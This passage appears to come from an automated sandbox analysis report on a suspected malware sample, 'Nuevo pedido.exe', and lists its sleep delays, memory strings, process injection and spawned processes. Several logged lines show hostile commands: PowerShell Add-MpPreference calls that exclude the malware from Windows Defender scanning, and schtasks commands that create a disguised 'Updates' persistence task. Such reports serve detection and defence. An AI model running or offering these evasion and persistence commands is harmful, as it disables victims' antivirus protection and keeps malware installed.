                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 7952Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -30437127721620741s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599782s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599657s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599407s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599282s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599157s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -599047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598938s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598813s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598688s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598563s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -598094s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597985s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597860s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597735s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597610s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597485s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597360s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597235s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -597110s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596985s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596860s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596735s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596610s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596485s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -596360s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595732s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595516s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595406s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595188s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -595063s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594842s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594516s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594391s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594282s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594157s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -594028s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -593922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -593801s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228Thread sleep time: -593667s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599282Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599157Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599032Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596891Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596766Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596532Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596407Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596282Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599782
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599282
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599157
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599047
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598563
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598438
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598219
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598094
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597985
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597860
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597735
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597610
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597485
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597360
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597235
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597110
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596985
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595732
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595625
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595516
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595406
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595297
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595188
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595063
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594842
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594734
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594625
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594516
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594391
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594282
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594157
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594028
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593922
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593801
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593667
                  Source: Nuevo pedido.exe, 00000009.00000002.4136615734.0000000001286000.00000004.00000020.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4136708781.0000000001467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory written: C:\Users\user\Desktop\Nuevo pedido.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory written: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeProcess created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT;@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(eU
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt:B
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8"
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\L-
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qyB
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt\'
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q w'
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLKO
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4}X
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8#9
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q UB
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd|^
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhD$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|J8
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPTH
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(fA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxN
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPtf
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`3%
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qy>
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT;F
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q03a
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 3q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|l(
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 6-
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q VK
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8D`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$~n
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q9
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$<h
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,N0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD<E
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,nN
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD\c
